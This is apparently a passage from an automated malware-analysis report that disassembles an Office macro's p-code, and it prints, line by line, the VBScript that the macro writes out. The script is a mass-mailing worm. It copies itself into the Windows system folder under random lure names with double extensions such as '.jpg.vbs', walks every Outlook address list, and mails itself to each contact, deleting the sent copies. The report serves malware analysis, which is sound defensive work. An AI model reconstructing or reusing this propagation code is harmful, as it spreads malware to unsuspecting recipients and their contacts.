Concat ' LitStr 0x0005 ") <> " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 "1" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 " then" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #45: ' LitStr 0x0008 "mirque()" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #46: ' LitStr 0x0006 "end if" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #47: ' LitStr 0x0011 "Function DoMail()" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #48: ' LitStr 0x0014 "On Error Resume Next" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #49: ' LitStr 0x000B "Dim fso, ws" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #50: ' LitStr 0x0017 "Set fso = CreateObject(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x001A "Scripting.filesystemobject" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #51: ' LitStr 0x0016 "Set ws = CreateObject(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000D "WScript.Shell" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #52: ' LitStr 0x0018 "Set OApp = CreateObject(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0013 "Outlook.Application" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #53: ' LitStr 0x0008 "if oapp=" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0007 "Outlook" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 " then" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #54: ' LitStr 0x000E "Dim wnames(16)" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #55: ' LitStr 0x000B "Dim wext(6)" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #56: ' LitStr 0x000A "wext(1) = " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0004 ".vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C ": wext(2) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0004 ".vbe" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C ": wext(3) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 ".txt.vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C ": wext(4) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 ".jpg.vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C ": wext(5) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 ".avi.vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C ": wext(6) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 ".scr.vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #57: ' LitStr 0x000C "wnames(9) = " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "links" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(1) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0004 "cool" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(2) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "funny" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(3) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F "anti-loveletter" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(4) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "guorm" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(5) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0003 "pot" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(6) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "win2k" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(7) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "icq2k" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000E ": wnames(8) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "money" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(10) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C "funnypic.jpg" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(11) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 "quake" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(12) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 "Year2K+1" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(13) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0006 "Mirc2K" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(14) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 "Word2001" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(15) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0008 "FunStuff" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F ": wnames(16) = " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0009 "WindowsMe" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #58: ' LitStr 0x0009 "Randomize" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #59: ' LitStr 0x0024 "wname2 = wnames(Int((16 Rnd) + 1))" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #60: ' LitStr 0x0009 "Randomize" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #61: ' LitStr 0x0020 "wext2 = wext(Int((6 * Rnd) + 1))" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #62: ' LitStr 0x0018 "newname = wname2 & wext2" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #63: ' LitStr 0x003F "fso.CopyFile wscript.scriptfullname, fso.GetSpecialFolder(1) & " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 "\" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000A " & newname" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #64: ' LitStr 0x001D "Set Mapi = OApp.GetNameSpace(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0004 "MAPI" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #65: ' LitStr 0x0025 "For Each AddList In Mapi.AddressLists" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #66: ' LitStr 0x0029 "If AddList.AddressEntries.Count <> 0 Then" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #67: ' LitStr 0x0034 "For AddListCount = 1 To AddList.AddressEntries.Count" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #68: ' LitStr 0x0037 "Set AddListEntry = AddList.AddressEntries(AddListCount)" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #69: ' LitStr 0x001C "Set msg = OApp.CreateItem(0)" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #70: ' LitStr 0x001D "msg.To = AddListEntry.Address" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #71: ' LitStr 0x000E "msg.Subject = " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0018 "You know what it is. ;-P" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #72: ' LitStr 0x000B "msg.Body = " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000D "Check it out!" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #73: ' LitStr 0x002E "msg.Attachments.Add fso.GetSpecialFolder(1) & " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 "\" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000A " & newname" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #74: ' LitStr 0x001C "msg.DeleteAfterSubmit = True" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #75: ' LitStr 0x000D "If msg.To <> " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 " Then" …

Open this report in the interactive analyzer, or submit your own file for analysis.